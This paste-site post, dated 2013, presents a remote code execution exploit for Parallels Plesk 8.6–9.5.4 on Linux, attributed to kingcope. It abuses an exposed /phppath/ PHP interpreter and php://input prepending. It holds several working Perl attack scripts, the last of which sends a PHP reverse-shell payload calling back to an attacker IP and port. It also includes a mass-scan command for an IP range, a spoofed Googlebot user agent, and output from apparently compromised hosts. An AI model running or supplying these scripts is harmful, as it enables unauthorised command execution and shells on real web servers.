Plesk Apache Zeroday Remote Exploit

SUBMITTED BY: Guest

DATE: Nov. 25, 2013, 9:06 p.m.

FORMAT: Text only

SIZE: 14.2 kB

Raw Download

HITS: 2323

Report
  1. Plesk Apache zeroday / June 2013
  2. discovered & exploited by kingcope
  5. this Plesk configuration setting makes it possible:
  6. scriptAlias /phppath/ "/usr/bin/"
  7. Furthermore this is not cve-2012-1823 because the php interpreter is called directly.
  8. (no php file is called)
  10. Parallels Plesk Remote Exploit -- PHP Code Execution and therefore Command Execution
  11. Affected and tested: Plesk 9.5.4
  12. Plesk 9.3
  13. Plesk 9.2
  14. Plesk 9.0
  15. Plesk 8.6
  16. Discovered & Exploited by Kingcope / June 2013
  17. Affected and tested OS: RedHat, CentOS, Fedora
  18. Affected and tested Platforms: Linux i386, Linux x86_64
  19. Untested OS: Windows (php.exe?)
  20. Unaffected: 11.0.9 due to compiled in protection of PHP version
  21. Traces in /var/log/httpd/access_log: 192.168.74.142 - - [19/Mar/2013:18:59:41 +0100] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%
  22. 6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%
  23. 62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%
  24. 3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 203 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
  25. Shodanhq overview of Plesk on Linux:
  26. http://www.shodanhq.com/search?q=plesklin
  28. perl plesk-simple.pl <ip address>
  29. ...
  30. ...
  31. ...
  32. OK
  33. Linux ip.unsecure.net 2.6.18-028stab101.1 #1 SMP Sun Jun 24
  34. 19:50:48 MSD 2012 i686 i686 i386 GNU/Linux
  35. uid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)
  36. ---
  37. ./pnscan -w"GET /phppath/php HTTP/1.0\r\n\r\n" -r "500 Internal" 76.12.54.163/16 80
  38. perl plesk-simple.pl 76.12.81.206
  39. HTTP/1.1 200 OK
  40. Date: Sat, 16 Mar 2013 13:39:35 GMT
  41. Server: Apache/2.2.3 (CentOS)
  42. Connection: close
  43. Transfer-Encoding: chunked
  44. Content-Type: text/html
  46. 77
  47. Linux 114114.unsecureweb.com 2.6.18-308.24.1.el5 #1 SMP Tue Dec 4 17:43:34 E
  48. ST 2012 x86_64 x86_64 x86_64 GNU/Linux
  50. 3e
  51. uid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)
  53. 0
  55. perl plesk-simple-ssl.pl <ip> (use HTTPS because HTTP gave an internal server error)
  56. HTTP/1.1 200 OK
  57. Date: Tue, 19 Mar 2013 15:29:28 GMT
  58. Server: Apache/2.0.54 (Fedora)
  59. Connection: close
  60. Transfer-Encoding: chunked
  61. Content-Type: text/html
  63. 3
  64. OK
  66. 60
  67. Linux www.ucdavis.edu 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 i686 i386 GNU/Linux
  69. 4c
  70. uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2522(psaserv)
  72. 0
  76. use IO::Socket;
  77. use URI::Escape;
  78. $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
  79. PeerPort => 80,
  80. Proto => 'tcp');
  81. $pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
  82. $arguments = uri_escape("-d","\0-\377"). "+" .
  83. uri_escape("allow_url_include=on","\0-\377"). "+" .
  84. uri_escape("-d","\0-\377"). "+" .
  85. uri_escape("safe_mode=off","\0-\377"). "+" .
  86. uri_escape("-d","\0-\377"). "+" .
  87. uri_escape("suhosin.simulation=on","\0-\377"). "+" .
  88. uri_escape("-d","\0-\377"). "+" .
  89. uri_escape("disable_functions=\"\"","\0-\377"). "+" .
  90. uri_escape("-d","\0-\377"). "+" .
  91. uri_escape("open_basedir=none","\0-\377"). "+" .
  92. uri_escape("-d","\0-\377"). "+" .
  93. uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
  94. uri_escape("-n","\0-\377");
  95. $path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
  96. print $sock "POST /$path?$arguments HTTP/1.1\r\n"
  97. ."Host: $ARGV[0]\r\n"
  98. ."Content-Type: application/x-www-form-urlencoded\r\n"
  99. ."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
  100. while(<$sock>) {
  101. print;
  102. }
  104. use IO::Socket::SSL;
  105. use URI::Escape;
  106. $sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],
  107. PeerPort => 443,
  108. Proto => 'tcp');
  109. $pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
  110. $arguments = uri_escape("-d","\0-\377"). "+" .
  111. uri_escape("allow_url_include=on","\0-\377"). "+" .
  112. uri_escape("-d","\0-\377"). "+" .
  113. uri_escape("safe_mode=off","\0-\377"). "+" .
  114. uri_escape("-d","\0-\377"). "+" .
  115. uri_escape("suhosin.simulation=on","\0-\377"). "+" .
  116. uri_escape("-d","\0-\377"). "+" .
  117. uri_escape("disable_functions=\"\"","\0-\377"). "+" .
  118. uri_escape("-d","\0-\377"). "+" .
  119. uri_escape("open_basedir=none","\0-\377"). "+" .
  120. uri_escape("-d","\0-\377"). "+" .
  121. uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
  122. uri_escape("-n","\0-\377");
  123. $path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
  124. print $sock "POST /$path?$arguments HTTP/1.1\r\n"
  125. ."Host: $ARGV[0]\r\n"
  126. ."Content-Type: application/x-www-form-urlencoded\r\n"
  127. ."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
  128. while(<$sock>) {
  129. print;
  130. }
  131. #CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch
  133. ###############################################################################################################
  135. plesk-simple-ssl.pl
  137. #plesk remote exploit by kingcope
  138. #all your base belongs to me :>
  139. use IO::Socket::SSL;
  140. use URI::Escape;
  141. $sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],
  142. PeerPort => 443,
  143. Proto => 'tcp');
  144. $pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
  145. $arguments = uri_escape("-d","\0-\377"). "+" .
  146. uri_escape("allow_url_include=on","\0-\377"). "+" .
  147. uri_escape("-d","\0-\377"). "+" .
  148. uri_escape("safe_mode=off","\0-\377"). "+" .
  149. uri_escape("-d","\0-\377"). "+" .
  150. uri_escape("suhosin.simulation=on","\0-\377"). "+" .
  151. uri_escape("-d","\0-\377"). "+" .
  152. uri_escape("disable_functions=\"\"","\0-\377"). "+" .
  153. uri_escape("-d","\0-\377"). "+" .
  154. uri_escape("open_basedir=none","\0-\377"). "+" .
  155. uri_escape("-d","\0-\377"). "+" .
  156. uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
  157. uri_escape("-n","\0-\377");
  158. $path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
  159. print $sock "POST /$path?$arguments HTTP/1.1\r\n"
  160. ."Host: $ARGV[0]\r\n"
  161. ."User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"
  162. ."Content-Type: application/x-www-form-urlencoded\r\n"
  163. ."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
  164. while(<$sock>) {
  165. print;
  166. }
  167. #CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch
  170. ###############################################################################################################
  172. plesk-simple.pl
  175. #plesk remote exploit by kingcope
  176. #all your base belongs to me :>
  177. use IO::Socket;
  178. use URI::Escape;
  179. $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
  180. PeerPort => 80,
  181. Proto => 'tcp');
  182. $pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
  183. $arguments = uri_escape("-d","\0-\377"). "+" .
  184. uri_escape("allow_url_include=on","\0-\377"). "+" .
  185. uri_escape("-d","\0-\377"). "+" .
  186. uri_escape("safe_mode=off","\0-\377"). "+" .
  187. uri_escape("-d","\0-\377"). "+" .
  188. uri_escape("suhosin.simulation=on","\0-\377"). "+" .
  189. uri_escape("-d","\0-\377"). "+" .
  190. uri_escape("disable_functions=\"\"","\0-\377"). "+" .
  191. uri_escape("-d","\0-\377"). "+" .
  192. uri_escape("open_basedir=none","\0-\377"). "+" .
  193. uri_escape("-d","\0-\377"). "+" .
  194. uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
  195. uri_escape("-n","\0-\377");
  196. $path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
  197. print $sock "POST /$path?$arguments HTTP/1.1\r\n"
  198. ."Host: $ARGV[0]\r\n"
  199. ."User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"
  200. ."Content-Type: application/x-www-form-urlencoded\r\n"
  201. ."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
  202. while(<$sock>) {
  203. print;
  204. }
  207. ###############################################################################################################
  209. plesk.pl
  211. #plesk remote exploit by kingcope
  212. #all your base belongs to me :>
  213. use IO::Socket;
  214. use IO::Socket::SSL;
  215. use URI::Escape;
  216. sub usage {
  217. print "usage: $0 <target> <http/https> <local_ip> <local_port>\n";exit;
  218. }
  219. if (!defined($ARGV[3])){usage();}
  220. $target=$ARGV[0];
  221. $proto=$ARGV[1];
  222. if ($proto eq "http") {
  223. $sock = IO::Socket::INET->new(
  224. PeerAddr => $ARGV[0],
  225. PeerPort => 80,
  226. Proto => 'tcp');
  227. }elsif ($proto eq "https") {
  228. $sock = IO::Socket::SSL->new(
  229. PeerAddr => $ARGV[0],
  230. PeerPort => 443,
  231. Proto => 'tcp');
  232. }else {usage();}
  233. $lip=$ARGV[2];
  234. $lport=$ARGV[3];
  235. $pwn="<?php echo \"Content-Type: text/plain\r\n\r\n\";set_time_limit (0); \$VERSION = \"1.0\"; \$ip =
  236. '$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null;
  237. \$error_a = null; \$shell = '/bin/sh -i'; \$daemon =
  238. 0;\$debug = 0; if (function_exists('pcntl_fork')) { \$pid =
  239. pcntl_fork(); if (\$pid == -1) { printit(\"ERROR: Can't fork\");
  240. exit(1);} if (\$pid) { exit(0);} if (posix_setsid() == -1) {
  241. printit(\"Error: Can't setsid()\"); exit(1); } \$daemon = 1;} else {
  242. printit(\"WARNING: Failed to daemonise. This is quite common and not
  243. fatal.\");}chdir(\"/\"); umask(0); \$sock = fsockopen(\$ip, \$port,
  244. \$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\");
  245. exit(1);} \$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 =>
  246. array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process =
  247. proc_open(\$shell, \$descriptorspec, \$pipes);if
  248. (!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\");
  249. exit(1);}stream_set_blocking(\$pipes[0],
  250. 0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2],
  251. 0);stream_set_blocking(\$sock, 0);while (1) { if (feof(\$sock)) {
  252. printit(\"done.\"); break;} if
  253. (feof(\$pipes[1])) {printit(\"done.\");break;}\$read_a = array(\$sock, \$pipes[1],
  254. \$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a,
  255. \$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug)
  256. printit(\"SOCK READ\");\$input = fread(\$sock,
  257. \$chunk_size);if(\$debug) printit(\"SOCK:
  258. \$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1],
  259. \$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input =
  260. fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT:
  261. \$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2],
  262. \$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input =
  263. fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR:
  264. \$input\");fwrite(\$sock,
  265. \$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print
  266. \"\$string\n\";}}
  267. ?>";
  268. $arguments=uri_escape("-d","\0-\377"). "+" .
  269. uri_escape("allow_url_include=on","\0-\377"). "+" .
  270. uri_escape("-d","\0-\377"). "+" .
  271. uri_escape("safe_mode=off","\0-\377"). "+" .
  272. uri_escape("-d","\0-\377"). "+" .
  273. uri_escape("suhosin.simulation=on","\0-\377"). "+" .
  274. uri_escape("-d","\0-\377"). "+" .
  275. uri_escape("disable_functions=\"\"","\0-\377"). "+" .
  276. uri_escape("-d","\0-\377"). "+" .
  277. uri_escape("open_basedir=none","\0-\377"). "+" .
  278. uri_escape("-d","\0-\377"). "+" .
  279. uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
  280. uri_escape("-n","\0-\377");
  281. $path=uri_escape("phppath","\0-\377"). "/" . uri_escape("php","\0-\377");
  282. print $sock "POST /$path?$arguments HTTP/1.1\r\n".
  283. "Host: $ARGV[0]\r\n".
  284. "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n".
  285. "Content-Type: text/plain\r\n".
  286. "Content-Length: ". length($pwn) ."\r\n\r\n". $pwn;
  287. while(<$sock>){print $_;};
  290. ###############################################################################################################
comments powered by Disqus